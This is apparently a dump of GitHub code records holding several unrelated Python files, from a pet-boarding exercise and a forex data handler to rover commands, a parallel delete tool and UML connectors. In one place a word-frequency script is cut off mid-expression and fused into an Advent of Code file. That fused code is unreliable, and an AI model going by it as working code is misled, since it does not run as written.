int(input(\"Enter number of customers to enter: \"))\n\n# collect information for each Customer\nfor iCount in range (0, numCustomers) :\n\n # collect customer information\n print(\"\\nInformation for customer number \" + str(iCount + 1))\n fName = input(\"\\nEnter first name: \")\n lName = input(\"Enter last name: \")\n cusAddress1 = input(\"Enter first address: \")\n cusAddress2 = input(\"Enter second address: \")\n cusCity = input(\"Enter city: \")\n cusState = input(\"Enter state: \")\n cusZip = input(\"Enter zip code: \")\n\n oCustomer = Customer(fName, lName, cusAddress1, cusAddress2, cusCity, cusState, cusZip)\n\n # determine number of pets for current customer\n petCount = int(input(\"\\nEnter number of pets: \"))\n\n # collect pet information for each pet by iterating through the list\n for jCount in range (0, petCount) :\n print(\"\\nInformation for pet number \" + str(jCount + 1))\n petName = input(\"\\nEnter pet's name: \")\n petBreed = input(\"Enter pet's breed: \")\n petAge = int(input(\"Enter pet's age: \"))\n\n # creates new pet object and appends to customer list\n oCustomer.cust_pet.append(Pet(petName, petBreed, petAge, oCustomer))\n\n # determine number of appointments for current pet\n appointCount = int(input(\"\\nEnter number of appointments for \" + oCustomer.cust_pet[len(oCustomer.cust_pet) - 1].pet_name + \": \"))\n\n # collect appointment information for each appointment by iterating through the list\n for kCount in range (0, appointCount) :\n print(\"\\nInformation for appointment number \" + str(kCount + 1))\n beginDate = datetime.strptime(input(\"\\nEnter the appointment start date in the format m/d/y: \"), \"%m/%d/%Y\").date()\n endDate = datetime.strptime(input(\"Enter end appointment end date in the format m/d/y: \"), \"%m/%d/%Y\").date()\n dayRate = float(input(\"Enter the rate per day: \"))\n print(\"\\n\")\n\n oCustomer.cust_pet[len(oCustomer.cust_pet) - 1].appointment[len(oCustomer.cust_pet[len(oCustomer.cust_pet) - 1].appointment) - 1].set_appointment(beginDate, endDate, dayRate)\n print(oCustomer.return_bill())\n\n payment = float(input(\"Enter a payment amount: \"))\n oCustomer.make_payment(payment)\n\n print(oCustomer.return_bill())\n print(\"\\n\")\n","repo_name":"Mhardy99/OOP_Group_Assignment","sub_path":"OOPGroup.py","file_name":"OOPGroup.py","file_ext":"py","file_size_in_byte":6208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74083781802","text":"from panda3d.core import Point3, Vec3, NodePath, ModelRoot\n\nfrom direct.distributed.DistributedSmoothNode import DistributedSmoothNode\n\nfrom src.coginvasion.phys.PhysicsNodePath import BasePhysicsObject\nfrom src.coginvasion.base.Precache import Precacheable, precacheModel, precacheSound\nfrom src.coginvasion.attack.BaseProjectileShared import BaseProjectileShared\n\nclass BaseProjectile(DistributedSmoothNode, BaseProjectileShared, BasePhysicsObject, Precacheable):\n \"\"\"\n A projectile.\n This impl just renders the projectile model at the positions reported by the server.\n \"\"\"\n\n ModelPath = None\n ModelOrigin = Point3(0, 0, 0)\n ModelAngles = Vec3(0, 0, 0)\n ModelScale = Vec3(1, 1, 1)\n\n ImpactSoundPath = None\n\n def __init__(self, cr):\n DistributedSmoothNode.__init__(self, cr)\n BaseProjectileShared.__init__(self)\n BasePhysicsObject.__init__(self)\n NodePath.__init__(self, ModelRoot(\"BaseProjectile\"))\n\n self.model = None\n self.impactSound = None\n\n def impact(self, pos, lastPos):\n pass\n\n @classmethod\n def 
doPrecache(cls):\n if cls.ModelPath:\n precacheModel(cls.ModelPath)\n if cls.ImpactSoundPath:\n precacheSound(cls.ImpactSoundPath)\n\n def wantsSmoothing(self):\n return 0\n\n def disable(self):\n self.stopWaterCheck()\n self.cleanupPhysics()\n if self.model:\n self.model.removeNode()\n self.model = None\n self.impactSound = None\n BaseProjectileShared.cleanup(self)\n DistributedSmoothNode.disable(self)\n\n def announceGenerate(self):\n DistributedSmoothNode.announceGenerate(self)\n self.stopSmooth()\n if self.ImpactSoundPath:\n self.impactSound = base.audio3d.loadSfx(self.ImpactSoundPath)\n if self.ModelPath:\n self.model = loader.loadModel(self.ModelPath)\n self.model.reparentTo(self)\n self.model.setPos(self.ModelOrigin)\n self.model.setHpr(self.ModelAngles)\n self.model.setScale(self.ModelScale)\n self.reparentTo(render)\n self.onSpawn()\n self.startWaterCheck()\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/attack/BaseProjectile.py","file_name":"BaseProjectile.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"} +{"seq_id":"28924838672","text":"from pandas import Series, DataFrame\nimport config\nimport event\nimport analysis as an\nimport mysql.connector\nfrom datetime import datetime, timedelta\nfrom dateutil.rrule import rrule, HOURLY, SECONDLY\n\n# Needs changing for DST\n\nclass DataHandler:\n # Pull and return latest rate (with Dataframe of N previous bars)\n # Add error check for time on df vs current time\n def get_latest_rate(self, ticker, granularity='M10', n=10):\n time = datetime.utcnow() + timedelta(hours = 1)\n df = an.average_dataframe(an.selectlast(ticker, granularity, datetime.utcnow() + timedelta(hours = 1), n))\n ev = event.Event('tick', time)\n ev.ticker = ticker\n ev.price = an.get_current_rate(ticker)\n ev.df = df\n ev.spread = an.get_spread(ticker)\n return ev\n\n\nclass HistoricalDataHandler:\n \n #Initialise row variable for iteration through dataframe\n def __init__(self, ticker, granularity, start, end):\n self.ticker = ticker\n self.granularity = granularity\n self.start = start\n self.end = end\n self.get_data()\n self.ohlc_dict = {'open':'first', 'high':'max', 'low':'min', 'close': 'last'}\n\n\n # Load handler with historical data - change to take granularity as input\n def get_data(self):\n df = an.average_dataframe(an.selectdates(self.ticker, self.granularity, self.start - timedelta(hours = 100), self.end))\n df_full = an.dataframe(an.selectdates(self.ticker, self.granularity, self.start - timedelta(hours = 100), self.end))\n self.lastrow = df.loc[df['time'] == self.start].index[0]\n self.df = df.set_index('time')\n self.df_full = df_full.set_index('time')\n\n\n def push_next_ma_bar_1h(self, gap=1300):\n ev = event.Event('tick', self.df.index[self.lastrow])\n ev.df = self.df[self.lastrow - gap:self.lastrow].resample('1H', how=self.ohlc_dict).dropna(how='any')\n ev.ticker = self.ticker\n ev.price = {'ask': self.df_full.iloc[self.lastrow]['closeAsk'], 'bid': self.df_full.iloc[self.lastrow]['closeBid']}\n ev.spread = round(an.pip_difference(self.df_full.iloc[self.lastrow]['closeAsk'], self.df_full.iloc[self.lastrow]['closeBid']), 1)\n self.lastrow += 1\n return ev\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yml980322037/Oanda","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
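The handler.py record above resamples 10-minute bars to hourly OHLC with df.resample('1H', how=self.ohlc_dict); that how= keyword belongs to the pre-0.18 pandas API and was later removed, so on current pandas the same per-column aggregation is spelled with .agg. A self-contained sketch on synthetic data; the dates, random seed, and frame layout are made up for illustration, and only the ohlc_dict mapping comes from the record:

import numpy as np
import pandas as pd

# Synthetic 10-minute bars covering one day.
idx = pd.date_range("2024-01-01", periods=144, freq="10min")
close = 100 + np.random.default_rng(0).normal(0, 0.1, len(idx)).cumsum()
bars = pd.DataFrame({"open": close, "high": close + 0.05,
                     "low": close - 0.05, "close": close}, index=idx)

# Same per-column aggregation as the record's ohlc_dict, modern spelling.
ohlc_dict = {"open": "first", "high": "max", "low": "min", "close": "last"}
hourly = bars.resample("1h").agg(ohlc_dict).dropna(how="any")
print(hourly.head())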
+{"seq_id":"71389878442","text":"import sort #imports merge sort and bubbledes\nimport ordsearch\nimport dup #imports count_dupes_per_file, merge_dupes_file\nimport util\n\ndef make_table(pairs):\n ref = count_files_words(pairs) #make a table which keeps in track the number of wrods in each file\n result1 = sort.merge_pairs(pairs) #merge sort the pairs\n result2 = dup.count_dupes_per_file(result1) #count the number of duplicates for each word in each file\n result3 = dup.merge_dupes_file(result2) #make a list for each word listing all the files they occur in\n for i in range(0,len(result3)): #calculates the frequency density for each word in each file using the list created above\n result3[i][1] = calculate_density(result3[i][1], ref) #carries out the function above for each i-th word\n result3 = make_des(result3) #makes it descending order\n return result3 #gives back the result\n\ndef count_files_words(pairs):\n ref = [] #makes an empty list to keep track of number of words for each file\n fileindex = 0\n fresh = pairs[0] #sets the file name as fresh, the first encountered file name is always the one that has not yet been repeated ie fresh\n ref.append([fresh[1], 1]) #keeps track of file name and number of wrods as a pair, [\"filename\", no. of words]\n for i in range(0,len(pairs)):\n if pairs[i][1] == fresh[1]: #if the filename in pairs is same as fresh,\n ref[fileindex][1] += 1 #increment counter of the number of words\n else: #new file name has been encountred\n fileindex += 1 #ref index is incremented for the new filename\n fresh = pairs[i] #make the pair filename fresh and repeat as for the first fresh element\n ref.append([fresh[1], 1])\n return ref #give back the data\n\ndef calculate_density(pairs, ref):\n for i in range(0,len(pairs)): #do the below for all list that was input for a specific word\n found = False #flag for if the file name is found in the ref array for the corresponding filename in the pair input\n j = 0\n value = 1\n while not(found) and j= sum_amt:\n curr_sum -= measurements[v - sum_amt]\n all_sums.append(curr_sum)\n\nall_sums = all_sums[sum_amt - 1:]\ntotal = 0\nfor i in range(len(all_sums) - 1):\n total += all_sums[i] < all_sums[i + 1]\nprint(f\"bruh i spent way too long figuring out what that A, B, C... meant: {total}\")\n","repo_name":"SansPapyrus683/advent-of-code","sub_path":"y2021/day1/sleigh_bells.py","file_name":"sleigh_bells.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"31509457850","text":"import logging\nlogger = logging.getLogger(__name__)\n\nimport numpy as np\nimport pandas as pd\n\nfrom .. data.mapdata import current_map\nfrom .. data.roverdata import robot\nfrom .. data.cfgdata import rovercfg\nfrom . import cmdlist\n\ndef takemap(perimeter: pd.DataFrame(), way: pd.DataFrame(), dock: bool) -> pd.DataFrame():\n perimeter = perimeter[perimeter['type'] != 'search wire']\n logger.info('Backend: Prepare map and way data for transmition')\n\n #Remove dockpoints, if neccessary (e.g. 
for goto command)\n if not dock:\n perimeter = perimeter[perimeter['type'] != 'dockpoints']\n\n data = pd.concat([perimeter, way], ignore_index=True)\n \n data = data.round(2)\n #Create AT+W messages\n amount_of_packages = data.index//30\n data['package_nr'] = amount_of_packages\n data['coords'] = ','+data['X'].astype(str)+','+data['Y'].astype(str) \n data = data.groupby('package_nr').agg({'coords': lambda x: list(x)})\n buffer = pd.DataFrame()\n for i, row in data.iterrows():\n buffer_str = ''.join(row['coords'])\n msg = {'msg': 'AT+W,'+str(i*30)+buffer_str}\n msg_df = pd.DataFrame([msg])\n buffer = pd.concat([buffer, msg_df], ignore_index=True)\n logger.debug('Add to takemap buffer: '+str(msg))\n\n #Create AT+N message\n perimeter_cnt = len(perimeter[perimeter['type'] == 'perimeter'])\n exclusion_names = perimeter['type'].unique()\n exclusion_names = np.delete(exclusion_names, np.where(exclusion_names == 'perimeter'))\n exclusion_names = np.delete(exclusion_names, np.where(exclusion_names == 'dockpoints'))\n exclusions_cnt = len(perimeter[perimeter['type'].isin(exclusion_names)])\n docking_cnt = len(perimeter[perimeter['type'] == 'dockpoints'])\n if way.empty:\n way_cnt = 0\n else:\n way_cnt = len(way[way['type'] == 'way'])\n msg = {'msg': 'AT+N,'+str(perimeter_cnt)+','+str(exclusions_cnt)+','+str(docking_cnt)+','+str(way_cnt)+',0'}\n msg_df = pd.DataFrame([msg])\n buffer = pd.concat([buffer, msg_df], ignore_index=True)\n\n #Create AT+X message\n exclusion_pts = []\n for exclusion in exclusion_names:\n exclusion_pts.append(len(perimeter[perimeter['type'] == exclusion]))\n exclusion_pts = str(exclusion_pts)\n exclusion_pts = exclusion_pts.replace('[', '')\n exclusion_pts = exclusion_pts.replace(']', '')\n exclusion_pts = exclusion_pts.replace(' ', '')\n msg = {'msg': 'AT+X,0,'+exclusion_pts}\n msg_df = pd.DataFrame([msg])\n buffer = pd.concat([buffer, msg_df], ignore_index=True)\n\n return buffer\n\ndef move(movement: list()) -> pd.DataFrame():\n if movement[0] !=0 or movement[1] != 0:\n msg = {'msg': 'AT+M,'+str(movement[0])+','+str(movement[1])}\n buffer = pd.DataFrame([msg])\n logger.debug(f'Backend: Command \"MOVE\" is prepared. X:{movement[0]} Y:{movement[1]}')\n return buffer\n elif movement[0] == 0 and movement[1] == 0:\n msg = {'msg': 'AT+M,0.0,0.0'}\n buffer = pd.DataFrame([msg])\n logger.debug(f'Backend: Command \"MOVE\" is prepared. 
X:{movement[0]} Y:{movement[1]}')\n cmdlist.cmd_move = False\n return buffer\n\ndef goto() -> pd.DataFrame():\n msg = {'msg': 'AT+C,0,1,'+str(rovercfg.gotospeed_setpoint)+',100,0,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command goto is prepared')\n cmdlist.cmd_goto = False\n return buffer\n\ndef stop():\n msg = {'msg': 'AT+C,0,0,-1,-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command stop is prepared')\n cmdlist.cmd_stop = False\n return buffer\n\ndef dock() -> pd.DataFrame():\n msg = {'msg': 'AT+C,0,4,-1,-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command dock is prepared')\n cmdlist.cmd_dock = False\n return buffer\n\ndef mow() -> pd.DataFrame():\n msg = {'msg': 'AT+C,1,1,'+str(rovercfg.mowspeed_setpoint)+',-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command start is prepared')\n cmdlist.cmd_mow = False\n return buffer\n\ndef shutdown() -> pd.DataFrame():\n msg = {'msg': 'AT+Y3'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command shutdown is preapred')\n cmdlist.cmd_shutdown = False\n return buffer\n\ndef reboot() -> pd.DataFrame():\n msg = {'msg': 'AT+Y'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command reboot is prepared')\n cmdlist.cmd_reboot = False\n return buffer\n\ndef gpsreboot() -> pd.DataFrame():\n msg = {'msg': 'AT+Y2'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command GPS reboot is prepared')\n cmdlist.cmd_gps_reboot = False\n return buffer\n\ndef togglemowmotor() -> pd.DataFrame():\n #mow motor switch on\n if not robot.last_mow_status:\n msg = {'msg': 'AT+C,1,-1,-1,-1,-1,-1,-1,-1'}\n cmdlist.cmd_toggle_mow_motor = False\n #mow motor switch off\n else:\n msg = {'msg': 'AT+C,0,-1,-1,-1,-1,-1,-1,-1'}\n cmdlist.cmd_toggle_mow_motor = False\n buffer = pd.DataFrame([msg])\n return buffer\n\ndef takepositionmode() -> pd.DataFrame():\n positionmode = rovercfg.positionmode\n if positionmode == 'absolute':\n positionmode = '1,'\n else:\n positionmode = '0,'\n msg = {'msg': 'AT+P,'+positionmode+str(rovercfg.lon)+','+str(rovercfg.lat)}\n buffer = pd.DataFrame([msg])\n cmdlist.cmd_set_positionmode = False\n return buffer\n\ndef changespeed(new_speed: float) -> pd.DataFrame():\n msg = {'msg': 'AT+C,-1,-1,'+str(new_speed)+',-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command change speed is prepared, new value is: '+str(new_speed))\n cmdlist.cmd_changemowspeed = False\n cmdlist.cmd_changegotospeed = False\n return buffer\n\ndef skipnextpoint() -> pd.DataFrame():\n msg = {'msg': 'AT+C,-1,-1,-1,-1,-1,-1,1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Command skip next point is prepared')\n cmdlist.cmd_skipnextpoint = False\n return buffer\n\ndef custom() -> pd.DataFrame():\n msg = {'msg': cmdlist.cmd_custom_str}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Custom command is prepared')\n cmdlist.cmd_custom = False\n cmdlist.cmd_custom_str = ''\n return buffer","repo_name":"EinEinfach/CaSSAndRA","sub_path":"CaSSAndRA/src/backend/comm/cmdtorover.py","file_name":"cmdtorover.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"38179275187","text":"from grass.script import core as gcore\n\n\ndef main():\n options, flags = gcore.parser()\n gisenv = gcore.gisenv()\n if \"MONITOR\" in gisenv:\n cmd_file = gcore.parse_command(\"d.mon\", flags=\"g\")[\"cmd\"]\n d_cmd = \"d.to.rast\"\n for param, val in 
options.items():\n if val:\n d_cmd += \" {param}={val}\".format(param=param, val=val)\n if gcore.overwrite():\n d_cmd += \" --overwrite\"\n with open(cmd_file, \"a\") as file_:\n file_.write(d_cmd)\n else:\n gcore.fatal(\n _(\"No graphics device selected. Use d.mon to select graphics device.\")\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OSGeo/grass","sub_path":"scripts/d.to.rast/d.to.rast.py","file_name":"d.to.rast.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"17925899426","text":"\"\"\" delete dirs and files in parallel \"\"\"\n\nimport functools\nimport glob\nimport os\nimport sys\nfrom pathlib import Path\nfrom typing import List\n\nfrom parallel_traversal import parallel_recursive_apply\n\n\ndef force_delete(path: Path, _, is_dir: bool) -> None:\n \"\"\" delete file or dir even if it is read-only \"\"\"\n try:\n if is_dir:\n path.rmdir()\n else:\n path.unlink()\n except PermissionError:\n pass\n else:\n return\n\n # try again after unsetting read-only flag\n try:\n if sys.platform == 'win32':\n os.chmod(path, 0o777)\n else:\n os.chmod(path, 0o777, follow_symlinks=False)\n if is_dir:\n path.rmdir()\n else:\n path.unlink()\n except PermissionError:\n # try finding locking process and its parent processes to inform user\n import psutil\n for proc in psutil.process_iter():\n try:\n if path in proc.open_files():\n break\n except psutil.NoSuchProcess:\n pass\n else:\n proc = None\n if proc is not None:\n print(f\"Failed to delete {path!r} because it is locked by \"\n f\"process {proc.name()} (pid={proc.pid}).\")\n print(\"Parent processes:\")\n for i, parent in enumerate(proc.parents()):\n print(f\"{' ' * i}`- {parent.name()} \"\n f\"({parent.pid})\")\n # reraise anyway\n raise\n\n\ndef parallel_rm_r(paths: List[str], num_max_threads: int = 512) -> None:\n \"\"\" delete dirs and files in parallel \"\"\"\n parallel_recursive_apply(\n paths,\n dir_func=functools.partial(force_delete, is_dir=True), # type: ignore\n file_func=functools.partial(force_delete, is_dir=False), # type: ignore\n pre_order=False,\n num_max_threads=num_max_threads)\n\n\ndef main() -> None:\n \"\"\" main function \"\"\"\n if len(sys.argv) < 2:\n print(\"Usage: python parallel_rm_r.py \"\n \" ...\")\n print(\" You can use wildcards * and ? 
to specify multiple \"\n \"files/directories.\")\n sys.exit(1)\n\n # get paths from command line arguments\n paths = []\n for pattern in sys.argv[1:]:\n if sys.version_info >= (3, 11):\n matches = glob.glob(pattern, recursive=True, include_hidden=True)\n else:\n matches = glob.glob(pattern, recursive=True)\n if not matches:\n # if pattern does not match anything, skip it\n print(f\"Warning: Skipped {pattern}: Does not match \"\n \"any file or directory.\")\n paths.extend(matches)\n\n # delete dirs and files in parallel\n parallel_rm_r(paths)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cosine0/parallel_files","sub_path":"parallel_rm_r.py","file_name":"parallel_rm_r.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23391479183","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.stats\nfrom matplotlib.patches import Ellipse\n\n\ndef plot_2d_contours(f, xlim, ylim,\n n_steps=200, n_contour=25,\n ax=None, **kwargs):\n x = np.linspace(xlim[0], xlim[1], n_steps)\n y = np.linspace(ylim[0], ylim[1], n_steps)\n grid = np.dstack(np.meshgrid(x, y))\n\n # Flatten out the grid to a simple list of co-ordinate points, this is\n # sometimes acceptable when a 3-d array input is not.\n coords_vec = grid.reshape(grid.shape[0]*grid.shape[1],-1)\n values_vec = f(coords_vec)\n # Reshape the output back into a grid:\n values_grid = values_vec.reshape(grid.shape[0],grid.shape[1])\n\n if ax is None:\n ax = plt.gca()\n contourset = ax.contourf(x, y, values_grid, n_contour, **kwargs)\n return contourset, ax\n\ndef get_2d_confidence_ellipse(mvgauss, confidence=0.95):\n \"\"\"\n Calculate the ellipse containing given proportion of probability mass. \n \n Args:\n mvgauss (MvGauss): (2-d) Multivariate Gaussian to use.\n confidence (float): Value from 0 to 1. If confidence=0.95, 95% of \n samples will fall within this ellipse. \n \n Returns:\n matplotlib.patches.Ellipse: The ellipse bounding the confidence region.\n \"\"\"\n # A useful refererence:\n # http://www.visiondummy.com/2014/04/draw-error-ellipse-representing-covariance-matrix/\n if len(mvgauss.mu)!=2:\n raise ValueError(\"Can only get confidence ellipse for 2-d Gaussian.\")\n # Might implement ellipsoids / projections at some point in the future\n # Invert the CDF at ``confidence`` to get the chisq value.\n chisq = scipy.stats.chi2(df=2).ppf(confidence)\n # print(\"PPF Chisq:\", chisq)\n # chisq = scipy.stats.chi2(df=2).isf(1. 
- confidence)\n # print(\"ISF Chisq:\", chisq)\n chi = chisq**0.5\n eigval, eigvec = mvgauss.eig\n rotated_std_dev = eigval**0.5\n rotation_angle = np.rad2deg(np.arctan2(eigvec[0][1],eigvec[0][0]))\n\n ell = Ellipse(mvgauss.mu,\n 2*chi*rotated_std_dev[0],\n 2*chi*rotated_std_dev[1],\n rotation_angle,\n fill=False)\n return ell\n\ndef plot_principal_axes(mvgauss, ax=None,\n **plot_kwargs):\n \"\"\"\n Plot lines along the principal components, connecting the +/- 1-sigma points.\n \n \"\"\"\n #Calculate the start and end co-ordinates for each principal vector\n start = -1*mvgauss.pcv.add(-mvgauss.mu, axis='index')\n end = mvgauss.pcv.add(mvgauss.mu, axis='index')\n\n if ax is None:\n ax = plt.gca()\n\n # Iterate over the component indices, drawing a line for each\n for c_idx in start:\n line_data = pd.concat((start[c_idx], end[c_idx]), axis=1)\n ax.plot(line_data.iloc[0], line_data.iloc[1], **plot_kwargs)\n return ax\n","repo_name":"4pisky/density-estimation-demos","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26742845175","text":"import asyncio\nimport random\nimport urllib.parse\nfrom pagermaid import Config, log\nfrom pagermaid.listener import listener\nfrom pagermaid.enums import Client, Message, AsyncClient\nfrom pagermaid.utils import lang, pip_install\n\npip_install(\"duckduckgo_search\")\nfrom duckduckgo_search import ddg\n@listener(command=\"ds\", description=\"DuckDuckGo Search\", parameters=\"[text/reply]\")\nasync def duckduckgo(client: Client, message: Message, request: AsyncClient):\n try:\n text = message.arguments or (message.reply_to_message.text if message.reply_to_message else None)\n if not text:\n m = await message.edit(lang('arg_error'))\n await asyncio.sleep(3)\n await m.safe_delete()\n return\n\n text = ' '.join(str(text).splitlines())\n info = await message.edit(f\"🤖正在努力搜索中...\\n\\n{text}\")\n params = {\"q\": text}\n encoded = urllib.parse.urlencode(params)\n url = f\"https://duckduckgo.com?{encoded}\"\n msg = f\"[手动搜索 {text}]({url})\"\n result = {}\n regions = ['us-en', 'cn-zh']\n max_results = 5\n\n for region in regions:\n for i in ddg(text, region=region, safesearch='Off', max_results=max_results):\n result[i['href']] = i['title']\n await asyncio.sleep(random.random())\n\n if result and len(result) > 0:\n links = '\\n'.join(f\"{i+1}. 
[{v}]({k})\" for i, (k, v) in enumerate(result.items()))\n content = f\"🔎 | **DuckduckGo** | [{text}]({url})\\n\\n{links}\"\n await info.edit(content, disable_web_page_preview=True)\n else:\n await info.edit(f\"搜索失败\\n\\n{msg}\")\n\n except Exception as e:\n emsg = f\"搜索失败:{e}\"\n if msg:\n emsg = f\"搜索失败:{e}\\n\\n{msg}\"\n m = await message.reply(emsg)\n await asyncio.sleep(5)\n await m.safe_delete()\n\n\n","repo_name":"onenora/saber","sub_path":"pgmpyro_plugins/duckduckgo.py","file_name":"duckduckgo.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38184101223","text":"print(\"\"\"________________________________________________________________________________________________________________________________\n _ _ _____ __ \n | | / / / ) / | , / , \n--|-/|-/-----__---/----__----__---_--_----__------_/_----__-------/----/----__---_--_---/__|-------)__---/--------__----__---__-\n |/ |/ /___) / / ' / ) / / ) /___) / / ) / / / ) / / ) / | / / ) / / / ) /___) (_ `\n__/__|____(___ _/___(___ _(___/_/_/__/_(___ _____(_ __(___/_____/____/___(___(_/_/__/_/____|_/___/_____/___/___/___/_(___ _(__)_\"\"\" '\\n')\n\ntry:\n from datetime import datetime\n from datetime import time\n import string\n import random\n\n # booking_day, month and time for flight passenger.\n booking_day = int(input(\"Enter the day: \"))\n booking_month= int(input(\"Enter the month: \"))\n booking_time = int(input(\"Enter a time in the format Hours: \"))\n booking_year = 2022\n\n #booking code\n # code = []\n # for i in range(10):\n # num = random.randint(0,10)\n # alphabet = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')\n # num_alphabet = code.append(num)\n\n booking_code = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 10))\n\n # datetime object containing current date and time\n now = datetime.now()\n\n # datetime as dt (alias) because datetime from datetime returns error.\n import datetime as dt\n booking_date = dt.datetime(booking_year, booking_month, booking_day, booking_time)\n checkin_start_time = 2\n checkIn_hours = dt.datetime(booking_year, booking_month, booking_day, checkin_start_time)\n if booking_date > now:\n checkIn_time = booking_time - checkin_start_time\n if checkIn_time <= checkin_start_time:\n checkIn_time += 24\n checkIn_time = str(checkIn_time) + ':' + '00' + ':' + '00.'\n print(\"\\n\" \"Thank You for booking with DamAirlines, Your booking date is\", booking_date, \"and your booking number is\", booking_code,\".\" '\\n' \"Your check-in time is from\", checkIn_time,\n \"Kindly check your email for booking confirmation.\")\n else:\n print(\"Error! 
Past date cannot be entered\")\n\nexcept( TypeError, ValueError, NameError):\n print(\"Please Enter a valid date\")\n\n\n","repo_name":"damosman/My-Projects","sub_path":"Exceptions.py","file_name":"Exceptions.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71054434605","text":"import logging\r\nimport azure.functions as func\r\n\r\napp = func.FunctionApp()\r\n\r\n@app.function_name(name=\"AzureFunctionInputOutputBinding\")\r\n@app.route(route=\"hello\")\r\n@app.blob_input(arg_name=\"inputblob\",\r\n path=\"inputbinding/ReadMe.txt\",\r\n connection=\"BLOB_CONNECTION_SETTING\")\r\n@app.blob_output(arg_name=\"outputblob\",\r\n path=\"outputbinding/test.txt\",\r\n connection=\"BLOB_CONNECTION_SETTING\")\r\ndef main(req: func.HttpRequest, inputblob: str, outputblob: func.Out[str]):\r\n logging.info(f'Python Queue trigger function processed {len(inputblob)} bytes')\r\n outputblob.set(inputblob)\r\n return \"ok\"","repo_name":"Pawanesh/AzureCloud","sub_path":"AzureFunctionInputOutputBinding/function_app.py","file_name":"function_app.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11424505768","text":"from __future__ import absolute_import\nfrom gaphor.adapters.connectors import AbstractConnect\nfrom zope import interface, component\nfrom gaphor.UML import uml2\nfrom gaphor.diagram import items\n\nclass MessageLifelineConnect(AbstractConnect):\n \"\"\"\n Connect lifeline with a message.\n\n A message can connect to both the lifeline's head (the rectangle)\n or the lifetime line. In case it's added to the head, the message\n is considered to be part of a communication diagram. If the message is\n added to a lifetime line, it's considered a sequence diagram.\n \"\"\"\n\n component.adapts(items.LifelineItem, items.MessageItem)\n\n def connect_lifelines(self, line, send, received):\n \"\"\"\n Always create a new Message with two EventOccurence instances.\n \"\"\"\n def get_subject():\n if not line.subject:\n message = self.element_factory.create(uml2.Message)\n message.name = 'call()'\n line.subject = message\n return line.subject\n\n if send:\n message = get_subject()\n if not message.sendEvent:\n event = self.element_factory.create(uml2.MessageOccurrenceSpecification)\n event.sendMessage = message\n event.covered = send.subject\n\n if received:\n message = get_subject()\n if not message.receiveEvent:\n event = self.element_factory.create(uml2.MessageOccurrenceSpecification)\n event.receiveMessage = message\n event.covered = received.subject\n\n\n def disconnect_lifelines(self, line):\n \"\"\"\n Disconnect lifeline and set appropriate kind of message item. 
If\n there are no lifelines connected on both ends, then remove the message\n from the data model.\n \"\"\"\n send = self.get_connected(line.head)\n received = self.get_connected(line.tail)\n\n if send:\n event = line.subject.receiveEvent\n if event:\n event.unlink()\n\n if received:\n event = line.subject.sendEvent\n if event:\n event.unlink()\n\n # one is disconnected and one is about to be disconnected,\n # so destroy the message\n if not send or not received:\n # Both ends are disconnected:\n message = line.subject\n del line.subject\n if not message.presentation:\n message.unlink()\n for message in list(line._messages):\n line.remove_message(message, False)\n message.unlink()\n\n for message in list(line._inverted_messages):\n line.remove_message(message, True)\n message.unlink()\n\n\n def allow(self, handle, port):\n \"\"\"\n Glue to lifeline's head or lifetime. If lifeline's lifetime is\n visible then disallow connection to lifeline's head.\n \"\"\"\n element = self.element\n lifetime = element.lifetime\n line = self.line\n opposite = line.opposite(handle)\n\n ol = self.get_connected(opposite)\n if ol:\n opposite_is_visible = ol.lifetime.visible\n # connect lifetimes if both are visible or both invisible\n return not (lifetime.visible ^ opposite_is_visible)\n\n return not (lifetime.visible ^ (port is element.lifetime.port))\n \n\n def connect(self, handle, port):\n super(MessageLifelineConnect, self).connect(handle, port)\n\n line = self.line\n send = self.get_connected(line.head)\n received = 